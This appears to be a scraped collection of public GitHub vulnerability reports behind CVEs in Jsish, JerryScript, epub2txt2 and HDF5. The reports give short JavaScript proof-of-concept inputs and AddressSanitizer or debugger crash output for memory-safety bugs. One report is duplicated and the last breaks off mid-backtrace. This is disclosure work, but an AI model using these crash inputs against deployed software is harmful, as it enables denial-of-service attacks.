Jsish v3.5.0 was discovered to contain a heap buffer overflow via NumberConstructor at src/jsiNumber.c.

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 0 comments

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

var a \= \[
    \[0\]
\];
var actual \= (Number).bind("abcdab", \[
    \[0\]
\].indexOf("abcdab", 99))();

​

**Execution steps & Output**

$ ./jsish/jsish poc.js

==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x604000018b40 at pc 0x55803d35220a bp 0x7fff119980c0 sp 0x7fff119980b0
WRITE of size 4 at 0x604000018b40 thread T0
    #0 0x55803d352209 in NumberConstructor src/jsiNumber.c:93
    #1 0x55803d325818 in jsi\_FuncCallSub src/jsiProto.c:244
    #2 0x55803d2a2fec in jsi\_FunctionInvoke src/jsiFunc.c:777
    #3 0x55803d2a2fec in Jsi\_FunctionInvoke src/jsiFunc.c:789
    #4 0x55803d31ead6 in jsi\_FuncBindCall src/jsiProto.c:299
    #5 0x55803d325818 in jsi\_FuncCallSub src/jsiProto.c:244
    #6 0x55803d5ef71a in jsiFunctionSubCall src/jsiEval.c:796
    #7 0x55803d5ef71a in jsiEvalFunction src/jsiEval.c:837
    #8 0x55803d5ef71a in jsiEvalCodeSub src/jsiEval.c:1264
    #9 0x55803d60315e in jsi\_evalcode src/jsiEval.c:2204
    #10 0x55803d607274 in jsi\_evalStrFile src/jsiEval.c:2665
    #11 0x55803d2f666a in Jsi\_Main src/jsiInterp.c:936
    #12 0x55803dafb03a in jsi\_main src/main.c:47
    #13 0x7ff56e70cbf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #14 0x55803d28a969 in \_start (/usr/local/bin/jsish+0xe8969)

0x604000018b40 is located 1 bytes to the right of 47-byte region \[0x604000018b10,0x604000018b3f)
allocated by thread T0 here:
    #0 0x7ff56f37bd28 in \_\_interceptor\_calloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xded28)
    #1 0x55803d2fbaa4 in Jsi\_Calloc src/jsiUtils.c:57

SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiNumber.c:93 in NumberConstructor
Shadow bytes around the buggy address:
  0x0c087fffb110: fa fa fd fd fd fd fd fa fa fa 00 00 00 00 00 00
  0x0c087fffb120: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c087fffb130: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c087fffb140: fa fa 00 00 00 00 00 fa fa fa 00 00 00 00 00 07
  0x0c087fffb150: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa
\=>0x0c087fffb160: fa fa 00 00 00 00 00 07\[fa\]fa 00 00 00 00 00 00
  0x0c087fffb170: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c087fffb180: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c087fffb190: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
  0x0c087fffb1a0: fa fa 00 00 00 00 00 00 fa fa fd fd fd fd fd fa
  0x0c087fffb1b0: fa fa fd fd fd fd fd fa fa fa fd fd fd fd fd fa
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb

Credits: Found by OWL337 team.

pcmacdon pushed a commit that referenced this issue

Dec 24, 2021

FossilOrigin-Name: 1a56f37adc0f00cd3e9e467873c4578299d4ac474be20f2e2658a05da20c32bc

2 participants

 ![@pcmacdon](https://avatars.githubusercontent.com/u/20356998?s=52&v=4)![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46482: Heap-buffer-overflow src/jsiNumber.c:93 in NumberConstructor · Issue #66 · pcmacdon/jsish

There is an Assertion ''ecma_is_value_boolean (base_value)'' failed at /jerry-core/ecma/operations/ecma-get-put-value.c in Jerryscript 3.0.0.

**JerryScript revision**

Commit: 51da1551

Version: v3.0.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

./tools/build.py --clean --debug --profile=es2015-subset --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

**Test case**

function JSEtest(f, n \= 1000) {
  for (let i \= 0; i < n; i++) {
    f();
  }
}

JSEtest(function () {
  class M {
    constructor() {
      this.\_x \= 45;
    }

    get foo() {
      return this.\_x;
    }

  }

  class N extends M {
    constructor(x \= () \=> super.foo) {
      super();
      x() \=== 45;
    }

    x(x \= () \=> super.foo) {
      return x();
    }

  }

  new N().x() \=== 45;
});

​

**Execution steps & Output**

version 3.0.0

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'ecma\_is\_value\_boolean (base\_value)' failed at /root/jerryscript/jerry-core/ecma/operations/ecma-get-put-value.c(ecma\_op\_get\_value\_object\_base):205.
Error: ERR\_FAILED\_INTERNAL\_ASSERTION

Credits: Found by OWL337 team.

CVE-2021-44993: Assertion 'ecma_is_value_boolean (base_value)' failed in ecma_op_get_value_object_base (ecma-get-put-value). · Issue #4876 · jerryscript-project/jerryscript

Jsish v3.5.0 was discovered to contain a heap buffer overflow via jsiEvalCodeSub in src/jsiEval.c. This vulnerability can lead to a Denial of Service (DoS).

New issue

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Closed

hope-fly opened this issue

Dec 24, 2021

· 1 comment

**Comments**

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

**Jsish revision**

Commit: 9fa798e

Version: v3.5.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

export CFLAGS='\-fsanitize=address'
make

**Test case**

assert(newObj.hasOwnProperty("prop")).throws(SyntaxError, function () {
    eval("'use strict'; function \_13\_0\_7\_fun() {eval = 42;};");
    \_13\_0\_7\_fun();
});

​

**Execution steps & Output**

$ ./jsish/jsish poc.js
=================================================================
========ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6250000028f8 at pc 0x55bcbd952990 bp 0x7ffd837e9530 sp 0x7ffd837e9520
READ of size 8 at 0x6250000028f8 thread T0
    #0 0x55bcbd95298f in jsiEvalCodeSub src/jsiEval.c:1366
    #1 0x55bcbd95c15e in jsi\_evalcode src/jsiEval.c:2204
    #2 0x55bcbd960274 in jsi\_evalStrFile src/jsiEval.c:2665
    #3 0x55bcbd64f66a in Jsi\_Main src/jsiInterp.c:936
    #4 0x55bcbde5403a in jsi\_main src/main.c:47
    #5 0x7f3599d46bf6 in \_\_libc\_start\_main (/lib/x86\_64-linux-gnu/libc.so.6+0x21bf6)
    #6 0x55bcbd5e3969 in \_start (/usr/local/bin/jsish+0xe8969)

0x6250000028f8 is located 8 bytes to the left of 8192-byte region \[0x625000002900,0x625000004900)
allocated by thread T0 here:
    #0 0x7f359a9b5f30 in realloc (/usr/lib/x86\_64-linux-gnu/libasan.so.4+0xdef30)
    #1 0x55bcbd654972 in Jsi\_Realloc src/jsiUtils.c:47

SUMMARY: AddressSanitizer: heap-buffer-overflow src/jsiEval.c:1366 in jsiEvalCodeSub
Shadow bytes around the buggy address:
  0x0c4a7fff84c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff84d0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff84e0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff84f0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c4a7fff8500: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
\=>0x0c4a7fff8510: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa\[fa\]
  0x0c4a7fff8520: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8530: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8540: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8550: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c4a7fff8560: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
  Addressable:           00
  Partially addressable: 01 02 03 04 05 06 07
  Heap left redzone:       fa
  Freed heap region:       fd
  Stack left redzone:      f1
  Stack mid redzone:       f2
  Stack right redzone:     f3
  Stack after return:      f5
  Stack use after scope:   f8
  Global redzone:          f9
  Global init order:       f6
  Poisoned by user:        f7
  Container overflow:      fc
  Array cookie:            ac
  Intra object redzone:    bb
  ASan internal:           fe
  Left alloca redzone:     ca
  Right alloca redzone:    cb
\========ABORTING

Credits: Found by OWL337 team.

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=88&v=4)

This issue may have a correlation with #56, but I'm not for sure.

1 participant

![@hope-fly](https://avatars.githubusercontent.com/u/59732293?s=52&v=4)

CVE-2021-46474: Heap-buffer-overflow src/jsiEval.c:1366 in jsiEvalCodeSub · Issue #57 · pcmacdon/jsish

There is an Assertion ''ecma_object_is_typedarray (obj_p)'' failed at /jerry-core/ecma/operations/ecma-typedarray-object.c in Jerryscript 3.0.0.

**JerryScript revision**

Commit: 51da1551 Version: v3.0.0

Commit: 8ba0d1b Version: v2.4.0

**Build platform**

Ubuntu 18.04.5 LTS (Linux 5.4.0-44-generic x86\_64)

**Build steps**

./tools/build.py --clean --debug --profile=es2015-subset --compile-flag=-fsanitize=address --compile-flag=-m32 --lto=off --logging=on --line-info=on --error-message=on --system-allocator=on --stack-limit=20

**Test case**

function isPoT(obj, name, type) {
  let desc;
  desc \= Object.getOwnPropertyDescriptor(obj, name);
  return typeof type \=== 'undefined' || typeof desc.value \=== type;
}

function getPs(obj, type) {
  let properties \= \[\];

  for (let name of Object.getOwnPropertyNames(obj)) {
    if (isPoT(obj, name, type)) {
      properties.push(name);
    }
  }

  return properties;
}

function\* genObj(root \= this, level \= 0) {
  if (level \> 4) {
    return;
  }

  let obj\_names \= getPs(root, 'object');

  for (let obj\_name of obj\_names) {
    if (obj\_name.startsWith('$')) {
      continue;
    } 

    let obj \= root\[obj\_name\];
    yield obj;
    yield\* genObj(obj, level + 1);
  }
}

function JSEtestObj() {
  let objects \= \[\];

  for (let obj of genObj()) {
    if (!objects.includes(obj)) {
      objects.push(obj);
    }
  }

  return objects;
}

function JSEtestFunc(obj) {
  return getPs(obj, 'function');
}

const thrower \= new Proxy({}, {
  get() {
    throw 0xc0defefe;
  }

});

for (let o of JSEtestObj()) {
  for (let f of JSEtestFunc(o)) {
    const arityPlusOne \= o\[f\].length + 1;
    try {
      o\[f\](Array(arityPlusOne).fill(thrower));
    } catch (e) {
      if (\`${e}\`.includes('1')) {
        try {
          new o\[f\](Array(arityPlusOne).fill(thrower));
        } catch (e) {}
      } else {
      }
    }
  }
}

​

**Execution steps & Output**

Version: v3.0.0

$ ./jerryscript/build/bin/jerry poc.js

ICE: Assertion 'ecma\_object\_is\_typedarray (obj\_p)' failed at /root/jerryscript/jerry-core/ecma/operations/ecma-typedarray-object.c(ecma\_get\_typedarray\_id):764.
Error: ERR\_FAILED\_INTERNAL\_ASSERTION

Version: v2.4.0

$ ~/jerryscript-2.4.0/build/bin/jerry poc.js
Script Error: assertion failed
Script backtrace (top 5):
 0: poc.js:72

Credits: Found by OWL337 team.

CVE-2021-44992: Assertion 'ecma_object_is_typedarray (obj_p)' failed in ecma-typedarray-object(ecma_get_typedarray_id) · Issue #4875 · jerryscript-project/jerryscript

xhtml_translate_entity in xhtml.c in epub2txt (aka epub2txt2) through 2.02 allows a stack-based buffer overflow via a crafted EPUB document.

**Description**

A stack-buffer-overflow was discovered in epub2txt2.  
The issue is being triggered in function xhtml\_translate\_entity() at src/xhtml.c:576

**Version**

Version 2.02 (Lastest)

**Environment**

Ubuntu 18.04, 64bit

**Reproduce****Command**

    git clone the Lastest Version firstly.
    make && make install
    ./epub2txt poc
    

POC file at the bottom of this report.

**With ASAN**

Note: You can use ASAN for more direct verification.

    Compile program with address sanitizer with this command:
    VERSION := 2.02
    CC      := gcc
    CFLAGS  := -Wall -fPIC -fPIE
    LDLAGS  := -pie 
    DESTDIR :=
    PREFIX  := /usr
    BINDIR  := /bin
    MANDIR  := /share/man
    APPNAME := epub2txt
    
    TARGET	:= epub2txt 
    SOURCES := $(shell find src/ -type f -name *.c)
    OBJECTS := $(patsubst src/%,build/%,$(SOURCES:.c=.o))
    DEPS	:= $(OBJECTS:.o=.deps)
    
    $(TARGET): $(OBJECTS)
    	$(CC) -fsanitize=address -o $(TARGET) $(LDFLAGS) $(OBJECTS) 
    
    build/%.o: src/%.c
    	@mkdir -p build/
    	$(CC) $(CFLAGS) -fsanitize=address -g -DVERSION=\"$(VERSION)\" -DAPPNAME=\"$(APPNAME)\" -MD -MF $(@:.o=.deps) -c -o $@ $< 
    
    clean:
    	$(RM) -r build/ $(TARGET) 
    
    install:
    	install -D -m 755 $(APPNAME) $(DESTDIR)/$(PREFIX)/$(BINDIR)/$(APPNAME)
    	install -D -m 644 man1/epub2txt.1 $(DESTDIR)/$(PREFIX)/$(MANDIR)/man1/epub2txt.1
    
    uninstall:
    	rm -f $(DESTDIR)/$(PREFIX)/$(BINDIR)/$(APPNAME)
    	rm -f $(DESTDIR)/$(PREFIX)/$(MANDIR)/man1/epub2txt.1
    
    -include $(DEPS)
    
    .PHONY: clean install
    
    

**ASAN Report**

    warning [./input/id:000029,sig:11,src:000553,time:174169875,op:havoc,rep:4]:  3 extra bytes at beginning or within zipfile
      (attempting to process anyway)
    file #1:  bad zipfile offset (local header sig):  3
      (attempting to re-compensate)
    /tmp/epub2txt14993/OEBPS/cover.xml  bad CRC aa74ee30  (should be 4874d916)
      error:  invalid compressed data to inflate /tmp/epub2txt14993/OEBPS/images/GeographyofBli-cover.jpg
    file #8:  bad zipfile offset (local header sig):  163411
      (attempting to re-compensate)
    file #8:  bad zipfile offset (local header sig):  163411
    file #9:  bad zipfile offset (local header sig):  181495
    /tmp/epub2txt14993/OEBPS/GeographyofBli_toc.html  bad CRC 0938f2f2  (should be 64dedce7)
    /tmp/epub2txt14993/OEBPS/GeographyofBli_copyright.html  bad CRC 5d8cbd1a  (should be 9b5bfa5d)
    /tmp/epub2txt14993/OEBPS/GeographyofBli_body_split_001.html  bad CRC 1a36209f  (should be 81fec8f3)
    =================================================================
    ==14993==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffcb14 at pc 0x7ffff6e7e3a6 bp 0x7fffffffca60 sp 0x7fffffffc208
    WRITE of size 305 at 0x7fffffffcb14 thread T0
        #0 0x7ffff6e7e3a5  (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5)
        #1 0x55555558000e in xhtml_translate_entity src/xhtml.c:576
        #2 0x555555580b34 in xhtml_to_stdout src/xhtml.c:789
        #3 0x555555580680 in xhtml_file_to_stdout src/xhtml.c:700
        #4 0x555555560476 in epub2txt_do_file src/epub2txt.c:494
        #5 0x55555555d3c9 in main src/main.c:187
        #6 0x7ffff6a48bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
        #7 0x55555555c219 in _start (/home/nisl1/nisl8121/Asteriska/fuzz/projects/epub2txt2-master/valid/epub2txt+0x8219)
    
    Address 0x7fffffffcb14 is located in stack of thread T0 at offset 116 in frame
        #0 0x55555557fad4 in xhtml_translate_entity src/xhtml.c:532
    
      This frame has 2 object(s):
        [32, 36) 'v'
        [96, 116) 'out' <== Memory access at offset 116 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5) 
    Shadow bytes around the buggy address:
      0x10007fff7910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7950: 00 00 00 00 f1 f1 f1 f1 04 f2 f2 f2 f2 f2 f2 f2
    =>0x10007fff7960: 00 00[04]f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7980: 00 00 f1 f1 f1 f1 f8 f2 f2 f2 00 00 00 00 00 00
      0x10007fff7990: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2
      0x10007fff79a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff79b0: 00 00 00 00 00 00 f1 f1 f1 f1 f8 f2 f2 f2 f2 f2
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==14993==ABORTING
    
    

**POC**

POC

Any issue plz contact with me:  
admin@hack.best  
OR:  
twitter: @Asteriska8

CVE-2022-23850: [Bug Report]stack-buffer-overflow in Function epub2txt_do_file() AT src/epub2txt.c · Issue #17 · kevinboone/epub2txt2

**Description**

A stack-buffer-overflow was discovered in epub2txt2.  
The issue is being triggered in function xhtml\_translate\_entity() at src/xhtml.c:576

**Version**

Version 2.02 (Lastest)

**Environment**

Ubuntu 18.04, 64bit

**Reproduce****Command**

    git clone the Lastest Version firstly.
    make && make install
    ./epub2txt poc
    

![image](https://user-images.githubusercontent.com/15817126/150640450-2db08fc2-b37f-47fc-a963-532f09e88412.png)

POC file at the bottom of this report.

**With ASAN**

Note: You can use ASAN for more direct verification.

    Compile program with address sanitizer with this command:
    VERSION := 2.02
    CC      := gcc
    CFLAGS  := -Wall -fPIC -fPIE
    LDLAGS  := -pie 
    DESTDIR :=
    PREFIX  := /usr
    BINDIR  := /bin
    MANDIR  := /share/man
    APPNAME := epub2txt
    
    TARGET	:= epub2txt 
    SOURCES := $(shell find src/ -type f -name *.c)
    OBJECTS := $(patsubst src/%,build/%,$(SOURCES:.c=.o))
    DEPS	:= $(OBJECTS:.o=.deps)
    
    $(TARGET): $(OBJECTS)
    	$(CC) -fsanitize=address -o $(TARGET) $(LDFLAGS) $(OBJECTS) 
    
    build/%.o: src/%.c
    	@mkdir -p build/
    	$(CC) $(CFLAGS) -fsanitize=address -g -DVERSION=\"$(VERSION)\" -DAPPNAME=\"$(APPNAME)\" -MD -MF $(@:.o=.deps) -c -o $@ $< 
    
    clean:
    	$(RM) -r build/ $(TARGET) 
    
    install:
    	install -D -m 755 $(APPNAME) $(DESTDIR)/$(PREFIX)/$(BINDIR)/$(APPNAME)
    	install -D -m 644 man1/epub2txt.1 $(DESTDIR)/$(PREFIX)/$(MANDIR)/man1/epub2txt.1
    
    uninstall:
    	rm -f $(DESTDIR)/$(PREFIX)/$(BINDIR)/$(APPNAME)
    	rm -f $(DESTDIR)/$(PREFIX)/$(MANDIR)/man1/epub2txt.1
    
    -include $(DEPS)
    
    .PHONY: clean install
    
    

**ASAN Report**

    warning [./input/id:000029,sig:11,src:000553,time:174169875,op:havoc,rep:4]:  3 extra bytes at beginning or within zipfile
      (attempting to process anyway)
    file #1:  bad zipfile offset (local header sig):  3
      (attempting to re-compensate)
    /tmp/epub2txt14993/OEBPS/cover.xml  bad CRC aa74ee30  (should be 4874d916)
      error:  invalid compressed data to inflate /tmp/epub2txt14993/OEBPS/images/GeographyofBli-cover.jpg
    file #8:  bad zipfile offset (local header sig):  163411
      (attempting to re-compensate)
    file #8:  bad zipfile offset (local header sig):  163411
    file #9:  bad zipfile offset (local header sig):  181495
    /tmp/epub2txt14993/OEBPS/GeographyofBli_toc.html  bad CRC 0938f2f2  (should be 64dedce7)
    /tmp/epub2txt14993/OEBPS/GeographyofBli_copyright.html  bad CRC 5d8cbd1a  (should be 9b5bfa5d)
    /tmp/epub2txt14993/OEBPS/GeographyofBli_body_split_001.html  bad CRC 1a36209f  (should be 81fec8f3)
    =================================================================
    ==14993==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7fffffffcb14 at pc 0x7ffff6e7e3a6 bp 0x7fffffffca60 sp 0x7fffffffc208
    WRITE of size 305 at 0x7fffffffcb14 thread T0
        #0 0x7ffff6e7e3a5  (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5)
        #1 0x55555558000e in xhtml_translate_entity src/xhtml.c:576
        #2 0x555555580b34 in xhtml_to_stdout src/xhtml.c:789
        #3 0x555555580680 in xhtml_file_to_stdout src/xhtml.c:700
        #4 0x555555560476 in epub2txt_do_file src/epub2txt.c:494
        #5 0x55555555d3c9 in main src/main.c:187
        #6 0x7ffff6a48bf6 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21bf6)
        #7 0x55555555c219 in _start (/home/nisl1/nisl8121/Asteriska/fuzz/projects/epub2txt2-master/valid/epub2txt+0x8219)
    
    Address 0x7fffffffcb14 is located in stack of thread T0 at offset 116 in frame
        #0 0x55555557fad4 in xhtml_translate_entity src/xhtml.c:532
    
      This frame has 2 object(s):
        [32, 36) 'v'
        [96, 116) 'out' <== Memory access at offset 116 overflows this variable
    HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
          (longjmp and C++ exceptions *are* supported)
    SUMMARY: AddressSanitizer: stack-buffer-overflow (/usr/lib/x86_64-linux-gnu/libasan.so.4+0x663a5) 
    Shadow bytes around the buggy address:
      0x10007fff7910: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7920: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7930: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7940: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7950: 00 00 00 00 f1 f1 f1 f1 04 f2 f2 f2 f2 f2 f2 f2
    =>0x10007fff7960: 00 00[04]f2 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7970: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff7980: 00 00 f1 f1 f1 f1 f8 f2 f2 f2 00 00 00 00 00 00
      0x10007fff7990: 00 00 00 00 00 00 00 00 f1 f1 f1 f1 00 f2 f2 f2
      0x10007fff79a0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
      0x10007fff79b0: 00 00 00 00 00 00 f1 f1 f1 f1 f8 f2 f2 f2 f2 f2
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
    ==14993==ABORTING
    
    

**POC**

POC

Any issue plz contact with me:  
admin@hack.best  
OR:  
twitter: @Asteriska8

A Divide By Zero vulnerability exists in HDF5 v1.13.1-1 vis the function H5T__complete_copy () at /hdf5/src/H5T.c. This vulnerability causes an aritmetic exception, leading to a Denial of Service (DoS).

**Version:**

    h5format_convert: Version 1.13.1-1
    

**System information**

    Ubuntu 20.04.1 LTS, gcc version 9.3.0 (Ubuntu 9.3.0-17ubuntu1~20.04)
    

**command:**

POC.zip

**Result**

**bt**

    program received signal SIGFPE, Arithmetic exception.
    [----------------------------------registers-----------------------------------]
    RAX: 0x0 
    RBX: 0x555555949fa0 --> 0x55555594a230 --> 0x7ffff7e55b00 --> 0x0 
    RCX: 0x21000004 
    RDX: 0x0 
    RSI: 0x0 
    RDI: 0x55555594a230 --> 0x7ffff7e55b00 --> 0x0 
    RBP: 0x55555594a250 --> 0x0 
    RSP: 0x7fffffffd290 --> 0x21000004 
    RIP: 0x55555570bb5f (<H5T__complete_copy+543>:	div    rsi)
    R8 : 0x55555570ea80 (<H5T__copy_all>:	endbr64)
    R9 : 0x7ffff7e55c50 --> 0x7ffff7e55c40 --> 0x7ffff7e55c30 --> 0x7ffff7e55c20 --> 0x7ffff7e55c10 --> 0x7ffff7e55c00 (--> ...)
    R10: 0x5555558fc010 --> 0x2000000010000 
    R11: 0x7ffff7e55be0 --> 0x55555594ff50 --> 0x0 
    R12: 0x1 
    R13: 0x55555594e740 --> 0x555555949930 --> 0x0 
    R14: 0x55555594a230 --> 0x7ffff7e55b00 --> 0x0 
    R15: 0x0
    EFLAGS: 0x10202 (carry parity adjust zero sign trap INTERRUPT direction overflow)
    [-------------------------------------code-------------------------------------]
       0x55555570bb54 <H5T__complete_copy+532>:	imul   rax,rcx
       0x55555570bb58 <H5T__complete_copy+536>:	sub    rcx,rsi
       0x55555570bb5b <H5T__complete_copy+539>:	add    QWORD PTR [rsp],rcx
    => 0x55555570bb5f <H5T__complete_copy+543>:	div    rsi
       0x55555570bb62 <H5T__complete_copy+546>:	mov    QWORD PTR [rbx+0x10],rax
       0x55555570bb66 <H5T__complete_copy+550>:	mov    rax,QWORD PTR [rsp+0x28]
       0x55555570bb6b <H5T__complete_copy+555>:	add    r12d,0x1
       0x55555570bb6f <H5T__complete_copy+559>:	cmp    DWORD PTR [rax+0x34],r12d
    [------------------------------------stack-------------------------------------]
    0000| 0x7fffffffd290 --> 0x21000004 
    0008| 0x7fffffffd298 --> 0x55555570ea80 (<H5T__copy_all>:	endbr64)
    0016| 0x7fffffffd2a0 --> 0x555555949f80 --> 0x55555594a050 --> 0x7ffff7e55b00 --> 0x0 
    0024| 0x7fffffffd2a8 --> 0x55555593f2d0 --> 0x0 
    0032| 0x7fffffffd2b0 --> 0x555555922020 --> 0x0 
    0040| 0x7fffffffd2b8 --> 0x55555593f340 --> 0x0 
    0048| 0x7fffffffd2c0 --> 0x55555594e740 --> 0x555555949930 --> 0x0 
    0056| 0x7fffffffd2c8 --> 0x555555949fa0 --> 0x55555594a230 --> 0x7ffff7e55b00 --> 0x0 
    [------------------------------------------------------------------------------]
    Legend: code, data, rodata, value
    Stopped reason: SIGFPE
    0x000055555570bb5f in H5T__complete_copy (new_dt=new_dt@entry=0x55555593f2d0, old_dt=old_dt@entry=0x555555922020, reopened_fo=reopened_fo@entry=0x0, set_memory_type=set_memory_type@entry=0x0, 
        copyfn=0x55555570ea80 <H5T__copy_all>) at /home/zxq/CVE_testing/source/hdf5/src/H5T.c:3613
    3613	                        new_dt->shared->u.compnd.memb[i].size =
    gdb-peda$ bt
    #0  0x000055555570bb5f in H5T__complete_copy (new_dt=new_dt@entry=0x55555593f2d0, old_dt=old_dt@entry=0x555555922020, reopened_fo=reopened_fo@entry=0x0, set_memory_type=set_memory_type@entry=0x0, 
        copyfn=0x55555570ea80 <H5T__copy_all>) at /home/zxq/CVE_testing/source/hdf5/src/H5T.c:3613
    #1  0x000055555570c1f6 in H5T_copy (old_dt=0x555555922020, method=method@entry=H5T_COPY_ALL) at /home/zxq/CVE_testing/source/hdf5/src/H5T.c:3774
    #2  0x0000555555680aa8 in H5O__dtype_copy (_src=<optimized out>, _dst=0x0) at /home/zxq/CVE_testing/source/hdf5/src/H5Odtype.c:1215
    #3  0x000055555568fe89 in H5O_msg_read_oh (f=0x555555941400, oh=oh@entry=0x55555594e470, type_id=type_id@entry=0x3, mesg=mesg@entry=0x0) at /home/zxq/CVE_testing/source/hdf5/src/H5Omessage.c:521
    #4  0x0000555555690129 in H5O_msg_read (loc=loc@entry=0x555555947d60, type_id=type_id@entry=0x3, mesg=mesg@entry=0x0) at /home/zxq/CVE_testing/source/hdf5/src/H5Omessage.c:455
    #5  0x00005555555cb237 in H5D__open_oid (dapl_id=0xb00000000000007, dataset=0x555555947d60) at /home/zxq/CVE_testing/source/hdf5/src/H5Dint.c:1707
    #6  H5D_open (loc=loc@entry=0x7fffffffd520, dapl_id=dapl_id@entry=0xb00000000000007) at /home/zxq/CVE_testing/source/hdf5/src/H5Dint.c:1512
    #7  0x00005555555cbfe8 in H5D__open_name (loc=loc@entry=0x7fffffffd5a0, name=name@entry=0x55555594e230 "/BAG_root/tracking_list", dapl_id=dapl_id@entry=0xb00000000000007)
